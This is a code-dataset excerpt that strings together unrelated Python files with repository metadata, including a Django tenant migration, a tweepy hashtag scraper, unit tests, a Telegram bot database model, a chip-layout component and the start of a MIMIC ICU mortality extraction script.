fnames = ['ccl-inputs-globe-122736+23.csv.gz'
,'ccl-inputs-globe-122760+23.csv.gz'
,'ccl-inputs-globe-122784+23.csv.gz'
,'ccl-inputs-globe-122808+23.csv.gz'
,'ccl-inputs-globe-122832+23.csv.gz'
,'ccl-inputs-globe-122856+23.csv.gz'
,'ccl-inputs-globe-122880+23.csv.gz'
,'ccl-inputs-globe-122904+23.csv.gz']
file_fpnames = [base+fname for fname in fnames]
print 'file_fpnames: ',file_fpnames
# quit()
###########################################################################
# Load
# precsno_arr, visibility_arr = load_for_ccl_inputs(file_name)
# For extinction, 1/visibility.
thresh_mnmx = (1.0e-3,1.0)
# The calculation
if True:
ccl_dask_object = ccl_dask()
ccl_dask_object.load_data_segments_with_loader(load_for_ccl_inputs,file_fpnames,[('visibility_i',np.nan,np.float)])
# Diagnostics
if False:
print 'ccl_dask_object.data_segs',ccl_dask_object.data_segs
print 'execute'
ccl_dask_object.data_segs[0].result()
print 'ccl_dask_object.data_segs',ccl_dask_object.data_segs
if True:
ccl_dask_object.make_stacks(thresh_mnmx)
ccl_dask_object.shift_labels()
ccl_dask_object.make_translations()
ccl_dask_object.apply_translations()
if False:
print 'ccl_dask_object.data_segs[0].results()[0]\n'\
,ccl_dask_object.data_segs[0].result()[0]
if True:
np.set_printoptions(threshold=5000,linewidth=600)
print 'ccl_dask_object.ccl_results[0].m_results_translated[0][0:60,0:60]\n'\
,ccl_dask_object.ccl_results[0].m_results_translated[0][0:60,0:60]
np.set_printoptions(threshold=1000,linewidth=75)
ccl_dask_object.close()
# Note, if we have to do the 3-hour blizzard calculation w/o CCL, then we can monkey with the load_data_segments to
# have files loaded onto separate cluster nodes, like ghost cells. Alternatively, we can Dask it by client.submitting
# tasks with dependencies on those two adjacent futures.
| 30.56962 | 119 | 0.670807 | 358 | 2,415 | 4.293296 | 0.332402 | 0.081978 | 0.135329 | 0.052049 | 0.424854 | 0.374105 | 0.296031 | 0.259597 | 0.233572 | 0.233572 | 0 | 0.065449 | 0.183851 | 2,415 | 78 | 120 | 30.961538 | 0.714358 | 0.171843 | 0 | 0.272727 | 0 | 0 | 0.308539 | 0.291252 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.068182 | null | null | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b19b6144712313556ed4af7f1913f9e90750f30c | 1,065 | py | Python | homepairs/HomepairsApp/Apps/Tenants/migrations/0001_initial.py | YellowRainBoots/2.0 | bf215350c2da0ab28ad2ec6f9338fb1b73b3f2e5 | [
"MIT"
] | 1 | 2021-01-19T00:48:10.000Z | 2021-01-19T00:48:10.000Z | homepairs/HomepairsApp/Apps/Tenants/migrations/0001_initial.py | YellowRainBoots/2.0 | bf215350c2da0ab28ad2ec6f9338fb1b73b3f2e5 | [
"MIT"
] | 17 | 2020-01-23T05:51:18.000Z | 2020-06-16T02:33:41.000Z | homepairs/HomepairsApp/Apps/Tenants/migrations/0001_initial.py | YellowRainBoots/2.0 | bf215350c2da0ab28ad2ec6f9338fb1b73b3f2e5 | [
"MIT"
] | 1 | 2020-08-06T02:10:58.000Z | 2020-08-06T02:10:58.000Z | # Generated by Django 3.0.2 on 2020-03-03 21:48
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('PropertyManagers', '0001_initial'),
('Properties', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tenant',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('firstName', models.CharField(max_length=100)),
('lastName', models.CharField(max_length=100)),
('email', models.CharField(max_length=255)),
('password', models.CharField(max_length=20)),
('place', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='Properties.Property')),
('pm', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='PropertyManagers.PropertyManager')),
],
),
]
| 35.5 | 139 | 0.611268 | 110 | 1,065 | 5.818182 | 0.536364 | 0.05 | 0.1125 | 0.15 | 0.20625 | 0.121875 | 0.121875 | 0.121875 | 0 | 0 | 0 | 0.042447 | 0.247887 | 1,065 | 29 | 140 | 36.724138 | 0.756554 | 0.042254 | 0 | 0 | 1 | 0 | 0.145383 | 0.031434 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.045455 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b1a21975ae4f7b1e5e6eec59130eae251c21b5f0 | 2,159 | py | Python | backend/fetch_tweet.py | phuens/Tweet_Analysis | 8d5fca79107bd4af5278a4530ea1131482f49b42 | [
"MIT"
] | null | null | null | backend/fetch_tweet.py | phuens/Tweet_Analysis | 8d5fca79107bd4af5278a4530ea1131482f49b42 | [
"MIT"
] | null | null | null | backend/fetch_tweet.py | phuens/Tweet_Analysis | 8d5fca79107bd4af5278a4530ea1131482f49b42 | [
"MIT"
] | null | null | null | import json
import csv
import tweepy
from textblob import TextBlob
import nltk
from nltk.tokenize import word_tokenize
def search_for_hashtags(consumer_key, consumer_secret, access_token, access_token_secret, hashtag_phrase):
# create authentication for accessing Twitter
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
# initialize Tweepy API
api = tweepy.API(auth)
# get the name of the spreadsheet we will write to
fname = "data"
string = " "
# open the spreadsheet we will write to
with open('%s.csv' % fname, 'w') as file:
w = csv.writer(file)
# write header row to spreadsheet
w.writerow(['timestamp', 'tweet_text', 'username',
'all_hashtags', 'followers_count', 'location'])
# for each tweet matching our hash tags, write relevant info to the spreadsheet
i = 1
for tweet in tweepy.Cursor(api.search, q=hashtag_phrase + ' -filter:retweets',
lang="en", tweet_mode='extended').items(5000):
string = string + tweet.full_text.replace('\n', ' ')
w.writerow([tweet.created_at, tweet.full_text.replace('\n', ' ').encode('utf-8'),
tweet.user.screen_name.encode('utf-8'),
[e['text'] for e in tweet._json['entities']['hashtags']], tweet.user.followers_count, tweet.user.location])
print(i , [tweet.created_at, tweet.full_text.replace('\n', ' ').encode('utf-8'),
tweet.user.screen_name.encode('utf-8'),
[e['text'] for e in tweet._json['entities']['hashtags']], tweet.user.followers_count, tweet.user.location])
i = i+1
print("Done")
#string = word_tokenize(string)
# print(nltk.pos_tag(string))
if __name__ == '__main__':
consumer_key =
consumer_secret =
access_token =
access_token_secret =
hashtag_phrase = 'geocode:27.466079,89.639010,30km'
search_for_hashtags(consumer_key, consumer_secret,
access_token, access_token_secret, hashtag_phrase)
| 38.553571 | 131 | 0.637332 | 270 | 2,159 | 4.888889 | 0.381481 | 0.075 | 0.064394 | 0.083333 | 0.481061 | 0.443939 | 0.40303 | 0.40303 | 0.40303 | 0.40303 | 0 | 0.017178 | 0.245021 | 2,159 | 55 | 132 | 39.254545 | 0.792638 | 0.148217 | 0 | 0.111111 | 0 | 0 | 0.11694 | 0.017486 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b1a4e4ea2b00add4c4b415ad7ce218f992351283 | 536 | py | Python | setup.py | msabramo/grr | 4b13392528d61a3d42e6c3baa14fa74cc920c055 | [
"CC0-1.0"
] | null | null | null | setup.py | msabramo/grr | 4b13392528d61a3d42e6c3baa14fa74cc920c055 | [
"CC0-1.0"
] | null | null | null | setup.py | msabramo/grr | 4b13392528d61a3d42e6c3baa14fa74cc920c055 | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python3
from setuptools import setup
import sys
setup(
name='grr',
version='0.2',
author='Kunal Mehta',
author_email='legoktm@gmail.com',
url='https://github.com/legoktm/grr/',
license='CC-0',
description='A command-line utility to work with Gerrit',
long_description=open('README.rst').read(),
packages=['grr'],
install_requires=['configparser'] if sys.version_info[0] == 2 else [],
entry_points={
'console_scripts': [
'grr = grr:main'
],
}
)
| 24.363636 | 74 | 0.613806 | 67 | 536 | 4.820896 | 0.776119 | 0.012384 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014354 | 0.220149 | 536 | 21 | 75 | 25.52381 | 0.758373 | 0.039179 | 0 | 0 | 0 | 0 | 0.321012 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.105263 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b1a5a19351b24a513cab2db62b55e27e8f29e1d1 | 3,899 | py | Python | tests/test_core.py | TheCheapestPixels/panda3d-stageflow | 7a049d939dec39e3ac780872bbaba5c25f309397 | [
"BSD-3-Clause"
] | 3 | 2020-10-04T18:52:37.000Z | 2022-02-21T13:21:45.000Z | tests/test_core.py | TheCheapestPixels/panda3d-stageflow | 7a049d939dec39e3ac780872bbaba5c25f309397 | [
"BSD-3-Clause"
] | 2 | 2020-05-28T03:33:47.000Z | 2020-05-28T03:38:30.000Z | tests/test_core.py | TheCheapestPixels/panda3d-stageflow | 7a049d939dec39e3ac780872bbaba5c25f309397 | [
"BSD-3-Clause"
] | null | null | null | from stageflow import Flow
from stageflow import Stage
def test_create_stage():
Stage()
def test_create_flow_bare():
flow = Flow()
assert flow.get_current_stage() is None
assert set(flow.get_stages()) == set([])
def test_create_flow_and_add_stage():
flow = Flow()
flow.add_stage('test', Stage())
assert flow.get_current_stage() is None
assert set(flow.get_stages()) == set(['test'])
def test_create_flow_with_stage():
flow = Flow(stages=dict(test=Stage()))
assert flow.get_current_stage() is None
assert set(flow.get_stages()) == set(['test'])
def test_create_flow_with_initial_stage():
class TestStage():
def enter(self, data):
pass
def exit(self):
pass
flow = Flow(
stages=dict(test=TestStage()),
initial_stage='test',
)
assert flow.get_current_stage() == 'test'
assert set(flow.get_stages()) == set(['test'])
def test_initial_stage_data_passed():
test_data = 'foo'
global passed_data
passed_data = None
class TestStage(Stage):
def enter(self, data):
global passed_data
passed_data = data
flow = Flow(
stages=dict(test=TestStage()),
initial_stage='test',
initial_stage_data=test_data,
)
assert passed_data == test_data
assert flow.get_current_stage() == 'test'
def test_transition_exit_and_entry():
global has_exited
has_exited = False
exit_data = 'foo_bar_baz'
global entry_data
entry_data = None
class TestStage(Stage):
def enter(self, data):
global entry_data
entry_data = data
def exit(self, data):
global has_exited
has_exited = True
return exit_data
flow = Flow(
stages=dict(
test_a=TestStage(),
test_b=TestStage(),
),
initial_stage='test_a',
)
assert flow.get_current_stage() == 'test_a'
assert entry_data is None
assert not has_exited
flow.transition('test_b')
assert flow.get_current_stage() == 'test_b'
assert entry_data == exit_data
assert has_exited
def test_pushing_substage():
global entry_data
entry_data = None
global exit_data
exit_data = None
class TestStage(Stage):
def enter(self, data):
global entry_data
entry_data = 'stage'
def exit(self, data):
global exit_data
exit_data = 'stage'
def exit_to_substage(self, substage, data):
global exit_data
exit_data = 'stage'
def reenter_from_substage(self, substage, data):
global entry_data
entry_data = 'stage'
class TestSubstage(Stage):
def enter(self, data):
global entry_data
entry_data = 'substage'
def exit(self, data):
global exit_data
exit_data = 'substage'
def exit_to_substage(self, data):
global exit_data
exit_data = 'substage'
def reenter_from_substage(self, substage, data):
global entry_data
entry_data = 'substage'
flow = Flow(
stages=dict(test=TestStage()),
substages=dict(test_substage=TestSubstage()),
initial_stage='test',
)
assert exit_data is None
assert entry_data == 'stage'
assert flow.get_current_substage() is None
flow.push_substage('test_substage')
assert exit_data == 'stage'
assert entry_data == 'substage'
assert flow.get_current_substage() == 'test_substage'
flow.pop_substage()
assert exit_data == 'substage'
assert entry_data == 'stage'
assert flow.get_current_substage() is None
# FIXME: Now add the ways that Flow *shouldn't* be usable:
# * transitioning to non-existent stages
# * passing invalid objects to Flow(stages=...)
| 24.36875 | 58 | 0.616055 | 478 | 3,899 | 4.761506 | 0.138075 | 0.075132 | 0.057118 | 0.087873 | 0.651582 | 0.543497 | 0.445518 | 0.434095 | 0.41696 | 0.3058 | 0 | 0 | 0.286997 | 3,899 | 159 | 59 | 24.522013 | 0.818705 | 0.036163 | 0 | 0.546218 | 0 | 0 | 0.048748 | 0 | 0 | 0 | 0 | 0.006289 | 0.210084 | 1 | 0.176471 | false | 0.058824 | 0.016807 | 0 | 0.243697 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
490a5d4dee030077442db885609423fe0007703e | 758 | py | Python | cli/cli_cloudformation.py | reneses/cloud-cli | 1f765cfb67cb9ffde1633fffe0da11893fb1503f | [
"MIT"
] | null | null | null | cli/cli_cloudformation.py | reneses/cloud-cli | 1f765cfb67cb9ffde1633fffe0da11893fb1503f | [
"MIT"
] | null | null | null | cli/cli_cloudformation.py | reneses/cloud-cli | 1f765cfb67cb9ffde1633fffe0da11893fb1503f | [
"MIT"
] | null | null | null | from menu import Menu, MenuEntry
from logic.cloudformation import CloudFormation
class CloudFormationCli:
"""
Menu for the AWS CloudFormation operations
"""
def __init__(self):
"""
Run the menu
"""
# Init the logic handler
self.cloudformation = CloudFormation()
# Init the menu
        Menu('Amazon Web Services (AWS) CloudFormation', [
MenuEntry('Go back', None),
MenuEntry('Generate web bucket', self.generate_web_bucket),
]).run()
def generate_web_bucket(self):
"""
Generate a web bucket
"""
print '# Generating web bucket'
self.cloudformation.generate_web_bucket()
print 'Web bucket generated'
| 25.266667 | 71 | 0.604222 | 77 | 758 | 5.818182 | 0.415584 | 0.140625 | 0.151786 | 0.09375 | 0.129464 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.307388 | 758 | 29 | 72 | 26.137931 | 0.853333 | 0.047493 | 0 | 0 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
490a7e4e927bf1f9002b7ce41d2b092342ed19da | 3,107 | py | Python | bot/models/__init__.py | masterbpro/radio-archive | c612cd845d969a6577a3facbdd8183048f8db2de | [
"MIT"
] | null | null | null | bot/models/__init__.py | masterbpro/radio-archive | c612cd845d969a6577a3facbdd8183048f8db2de | [
"MIT"
] | null | null | null | bot/models/__init__.py | masterbpro/radio-archive | c612cd845d969a6577a3facbdd8183048f8db2de | [
"MIT"
] | null | null | null | from datetime import datetime, timedelta
from peewee import SqliteDatabase, Model, PrimaryKeyField, IntegerField, CharField, BooleanField, DateTimeField
from bot.data.config import STATIC_DIR
from bot.utils.logging import logger
db = SqliteDatabase(f"{STATIC_DIR}/db.sqlite3")
class User(Model):
"""
    Class describing the fields in the user table
"""
id = PrimaryKeyField(null=False, unique=True)
user_id = IntegerField(null=False, unique=True)
full_name = CharField(null=False, max_length=255)
username = CharField(null=True, max_length=128)
is_subscribe = BooleanField(null=False, default=False)
    created = DateTimeField(default=datetime.now)
def add_user(self, user_id: int, full_name: str, username: str) -> bool:
"""
        Add a user to the database
        :param user_id: the user's Telegram ID
        :param full_name: the account's full name
        :param username: the account's username
        :return: the created record, or None if creation failed
"""
try:
return self.create(user_id=user_id,
full_name=full_name,
username=username)
except Exception as addUserError:
print(addUserError)
def get_user(self, user_id: int) -> [Model, bool]:
"""
        Check whether a user exists in the database
        :param user_id: the user's Telegram ID
        :return: the matching record if found, otherwise False
"""
res = self.get_or_none(User.user_id == user_id)
        if res:  # user was found
return res
return False
class Meta:
database = db
class Archive(Model):
"""
    Model for storing archive records
"""
id = PrimaryKeyField(null=False, unique=True)
start_date = DateTimeField(null=False)
finish_date = DateTimeField(null=False)
file_id = CharField(null=False, max_length=50)
class Meta:
database = db
def get_archive(self, hour, day, month, year):
"""
        Get the archive entry for the given hour, day, month and year
:param hour:
:param day:
:param month:
:param year:
:return:
"""
archive_date = datetime.strptime(f"{year}/{month}/{day}-{hour}", "%Y/%m/%d-%H").strftime("%Y-%m-%d %H")
return self.get_or_none(Archive.start_date >= archive_date)
def add_archive(self, start_date, file_id):
"""
        Add an archive recording to the database
:param start_date:
:param file_id:
:return:
"""
check = self.get_or_none(Archive.start_date == start_date)
if check:
check.file_id = file_id
check.save()
logger.info(f"Update archive [{start_date}] with file [{file_id}]")
return self.get(Archive.start_date == start_date)
return self.create(
start_date=start_date,
finish_date=start_date + timedelta(hours=1),
file_id=file_id
)
User.create_table(safe=True)
Archive.create_table(safe=True)
user = User()
archive = Archive()
| 30.762376 | 111 | 0.620856 | 376 | 3,107 | 4.981383 | 0.345745 | 0.057662 | 0.03417 | 0.030432 | 0.168713 | 0.103577 | 0.065136 | 0 | 0 | 0 | 0 | 0.004468 | 0.279691 | 3,107 | 100 | 112 | 31.07 | 0.83244 | 0.193756 | 0 | 0.115385 | 0 | 0 | 0.054185 | 0.022026 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.538462 | 0.019231 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4912467ee29fbe811c78fea1ef046cb9707fcd7e | 2,507 | py | Python | gdsfactory/components/resistance_sheet.py | simbilod/gdsfactory | 4d76db32674c3edb4d16260e3177ee29ef9ce11d | [
"MIT"
] | null | null | null | gdsfactory/components/resistance_sheet.py | simbilod/gdsfactory | 4d76db32674c3edb4d16260e3177ee29ef9ce11d | [
"MIT"
] | null | null | null | gdsfactory/components/resistance_sheet.py | simbilod/gdsfactory | 4d76db32674c3edb4d16260e3177ee29ef9ce11d | [
"MIT"
] | null | null | null | from functools import partial
from gdsfactory.cell import cell
from gdsfactory.component import Component
from gdsfactory.components.compass import compass
from gdsfactory.components.via_stack import via_stack_slab_npp_m3
from gdsfactory.types import ComponentSpec, Floats, LayerSpecs, Optional
pad_via_stack_slab_npp = partial(via_stack_slab_npp_m3, size=(80, 80))
@cell
def resistance_sheet(
width: float = 10,
layers: LayerSpecs = ("SLAB90", "NPP"),
layer_offsets: Floats = (0, 0.2),
pad: ComponentSpec = pad_via_stack_slab_npp,
pad_pitch: float = 100.0,
ohms_per_square: Optional[float] = None,
port_orientation1: int = 180,
port_orientation2: int = 0,
) -> Component:
"""Returns Sheet resistance.
keeps connectivity for pads and first layer in layers
Args:
width: in um.
layers: for the middle part.
layer_offsets: from edge, positive: over, negative: inclusion.
pad: function to create a pad.
pad_pitch: in um.
ohms_per_square: optional sheet resistance to compute info.resistance.
port_orientation1: in degrees.
port_orientation2: in degrees.
"""
c = Component()
pad = pad()
length = pad_pitch - pad.get_setting("size")[0]
pad1 = c << pad
pad2 = c << pad
r0 = c << compass(
size=(length + layer_offsets[0], width + layer_offsets[0]), layer=layers[0]
)
for layer, offset in zip(layers[1:], layer_offsets[1:]):
c << compass(size=(length + 2 * offset, width + 2 * offset), layer=layer)
pad1.connect("e3", r0.ports["e1"])
pad2.connect("e1", r0.ports["e3"])
c.info["resistance"] = ohms_per_square * width * length if ohms_per_square else None
c.add_port(
"pad1",
port_type="vertical_dc",
midpoint=pad1.center,
layer=list(layers)[-1],
width=width,
orientation=port_orientation1,
)
c.add_port(
"pad2",
port_type="vertical_dc",
midpoint=pad2.center,
layer=list(layers)[-1],
width=width,
orientation=port_orientation2,
)
return c
if __name__ == "__main__":
# import gdsfactory as gf
# sweep = [resistance_sheet(width=width, layers=((1,0), (1,1))) for width in [1, 10, 100]]
# c = gf.pack(sweep)[0]
c = resistance_sheet(width=40)
c.show()
# import gdsfactory as gf
# sweep_resistance = list(map(resistance_sheet, (5, 10, 80)))
# c = gf.grid(sweep_resistance)
# c.show()
| 28.816092 | 94 | 0.643797 | 331 | 2,507 | 4.694864 | 0.320242 | 0.045045 | 0.030888 | 0.03861 | 0.184041 | 0.105534 | 0.060489 | 0.060489 | 0.060489 | 0 | 0 | 0.03663 | 0.237734 | 2,507 | 86 | 95 | 29.151163 | 0.776557 | 0.265656 | 0 | 0.156863 | 0 | 0 | 0.038677 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0.058824 | 0.117647 | 0 | 0.156863 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4913c3ea285b469820f3898e3feff4274634fe9e | 494 | py | Python | VerifyServer.py | ACueva/Avi-Playground | cb1768999630ed884cff5d40c0faa86d24802754 | [
"Apache-2.0"
] | null | null | null | VerifyServer.py | ACueva/Avi-Playground | cb1768999630ed884cff5d40c0faa86d24802754 | [
"Apache-2.0"
] | null | null | null | VerifyServer.py | ACueva/Avi-Playground | cb1768999630ed884cff5d40c0faa86d24802754 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import os
import urllib2, json
from urlparse import urlparse
def ParseURL(agsURL):
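    """Split the given server URL into its components via urlparse."""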
print agsURL
ags = urlparse(agsURL)
return ags
def GetFolders(agsURL):
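    """Fetch the endpoint's JSON and print each entry of its 'folders' list."""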
f = urllib2.urlopen(agsURL)
j = json.loads(f.read())
for item in j["folders"]:
print item
def MapServiceQuery(agsURL):
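    """Fetch the endpoint's JSON and print the name of each entry in its 'layers' list."""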
f = urllib2.urlopen(agsURL)
#print f.read()
j = json.loads(f.read())
for item in j["layers"]:
print item["name"] | 21.478261 | 31 | 0.61336 | 66 | 494 | 4.590909 | 0.439394 | 0.049505 | 0.092409 | 0.138614 | 0.343234 | 0.165017 | 0.165017 | 0.165017 | 0.165017 | 0 | 0 | 0.008242 | 0.263158 | 494 | 23 | 32 | 21.478261 | 0.824176 | 0.068826 | 0 | 0.222222 | 0 | 0 | 0.037037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
491871e30f2b60781d5b69aef6ac73571b60d676 | 19,637 | py | Python | homework1/problem3/local/mort_icu.py | criticaldata/hst953-2021 | b18c8235a6c878a4a7d3d330a9b69421f0217273 | [
"MIT"
] | 1 | 2022-03-15T15:52:45.000Z | 2022-03-15T15:52:45.000Z | homework1/problem3/local/mort_icu.py | MDenu/HST-homework | fff0f277ee18735acbe84dfe8c428e92991b28fa | [
"MIT"
] | null | null | null | homework1/problem3/local/mort_icu.py | MDenu/HST-homework | fff0f277ee18735acbe84dfe8c428e92991b28fa | [
"MIT"
] | 3 | 2021-09-10T19:14:54.000Z | 2021-09-26T22:23:05.000Z | # Generates the following data files from MIMIC:
# adult_icu.gz: data from adult ICUs
# n_icu.gz: data from neonatal ICUs
# adult_notes.gz: clinical notes from adult ICUs
# Import libraries
import numpy as np
import pandas as pd
import psycopg2
from scipy.stats import ks_2samp
import os
# Output directory to generate the files
mimicdir = os.path.expanduser("./mimic_data/")
np.random.seed(42)
# create a database connection
sqluser = 'mimicuser'
dbname = 'mimic'
schema_name = 'mimiciii'
# Connect to local postgres version of mimic
con = psycopg2.connect(dbname=dbname, user=sqluser, host='127.0.0.1', password='PASSWORD')
cur = con.cursor()
cur.execute('SET search_path to ' + schema_name)
#========helper function for imputing missing values
def replace(group):
"""
takes in a pandas group, and replaces the
null value with the mean of the none null
values of the same group
"""
mask = group.isnull()
group[mask] = group[~mask].mean()
return group
#========get the icu details
# this query extracts the following:
# Unique ids for the admission, patient and icu stay
# Patient gender
# admission & discharge times
# length of stay
# age
# ethnicity
# admission type
# in hospital death?
# in icu death?
# one year from admission death?
# first hospital stay
# icu intime, icu outime
# los in icu
# first icu stay?
denquery = \
"""
-- This query extracts useful demographic/administrative information for patient ICU stays
--DROP MATERIALIZED VIEW IF EXISTS icustay_detail CASCADE;
--CREATE MATERIALIZED VIEW icustay_detail as
--ie is the icustays table
--adm is the admissions table
SELECT ie.subject_id, ie.hadm_id, ie.icustay_id
, pat.gender
, adm.admittime, adm.dischtime, adm.diagnosis
, ROUND( (CAST(adm.dischtime AS DATE) - CAST(adm.admittime AS DATE)) , 4) AS los_hospital
, ROUND( (CAST(adm.admittime AS DATE) - CAST(pat.dob AS DATE)) / 365, 4) AS age
, adm.ethnicity, adm.ADMISSION_TYPE
--, adm.hospital_expire_flag
, CASE when adm.deathtime between ie.intime and ie.outtime THEN 1 ELSE 0 END AS mort_icu
, DENSE_RANK() OVER (PARTITION BY adm.subject_id ORDER BY adm.admittime) AS hospstay_seq
, CASE
WHEN DENSE_RANK() OVER (PARTITION BY adm.subject_id ORDER BY adm.admittime) = 1 THEN 1
ELSE 0 END AS first_hosp_stay
-- icu level factors
, ie.intime, ie.outtime
, ie.FIRST_CAREUNIT
, ROUND( (CAST(ie.outtime AS DATE) - CAST(ie.intime AS DATE)) , 4) AS los_icu
, DENSE_RANK() OVER (PARTITION BY ie.hadm_id ORDER BY ie.intime) AS icustay_seq
-- first ICU stay *for the current hospitalization*
, CASE
WHEN DENSE_RANK() OVER (PARTITION BY ie.hadm_id ORDER BY ie.intime) = 1 THEN 1
ELSE 0 END AS first_icu_stay
FROM icustays ie
INNER JOIN admissions adm
ON ie.hadm_id = adm.hadm_id
INNER JOIN patients pat
ON ie.subject_id = pat.subject_id
WHERE adm.has_chartevents_data = 1
ORDER BY ie.subject_id, adm.admittime, ie.intime;
"""
den = pd.read_sql_query(denquery,con)
#----drop patients with less than 48 hour
den['los_icu_hr'] = (den.outtime - den.intime).astype('timedelta64[h]')
den = den[(den.los_icu_hr >= 48)]
den = den[(den.age<300)]
den.drop('los_icu_hr', axis = 1, inplace = True)
# den.isnull().sum()
#----clean up
# micu --> medical
# csru --> cardiac surgery recovery unit
# sicu --> surgical icu
# tsicu --> Trauma Surgical Intensive Care Unit
# NICU --> Neonatal
den['adult_icu'] = np.where(den['first_careunit'].isin(['PICU', 'NICU']), 0, 1)
den['gender'] = np.where(den['gender']=="M", 1, 0)
# no need to yell
den.ethnicity = den.ethnicity.str.lower()
den.ethnicity.loc[(den.ethnicity.str.contains('^white'))] = 'white'
den.ethnicity.loc[(den.ethnicity.str.contains('^black'))] = 'black'
den.ethnicity.loc[(den.ethnicity.str.contains('^hisp')) | (den.ethnicity.str.contains('^latin'))] = 'hispanic'
den.ethnicity.loc[(den.ethnicity.str.contains('^asia'))] = 'asian'
den.ethnicity.loc[~(den.ethnicity.str.contains('|'.join(['white', 'black', 'hispanic', 'asian'])))] = 'other'
den = pd.concat([den, pd.get_dummies(den['ethnicity'], prefix='eth')], axis = 1)
den = pd.concat([den, pd.get_dummies(den['admission_type'], prefix='admType')], axis = 1)
den.drop(['diagnosis', 'hospstay_seq', 'los_icu','icustay_seq', 'admittime', 'dischtime','los_hospital', 'intime', 'outtime', 'ethnicity', 'admission_type', 'first_careunit'], axis = 1, inplace = True)
#========= 48 hour vitals query
# these are the normal ranges. useful to clean
# up the data
vitquery = \
"""
-- This query pivots the vital signs for the first 48 hours of a patient's stay
-- Vital signs include heart rate, blood pressure, respiration rate, and temperature
-- DROP MATERIALIZED VIEW IF EXISTS vitalsfirstday CASCADE;
-- create materialized view vitalsfirstday as
SELECT pvt.subject_id, pvt.hadm_id, pvt.icustay_id
-- Easier names
, min(case when VitalID = 1 then valuenum else null end) as HeartRate_Min
, max(case when VitalID = 1 then valuenum else null end) as HeartRate_Max
, avg(case when VitalID = 1 then valuenum else null end) as HeartRate_Mean
, min(case when VitalID = 2 then valuenum else null end) as SysBP_Min
, max(case when VitalID = 2 then valuenum else null end) as SysBP_Max
, avg(case when VitalID = 2 then valuenum else null end) as SysBP_Mean
, min(case when VitalID = 3 then valuenum else null end) as DiasBP_Min
, max(case when VitalID = 3 then valuenum else null end) as DiasBP_Max
, avg(case when VitalID = 3 then valuenum else null end) as DiasBP_Mean
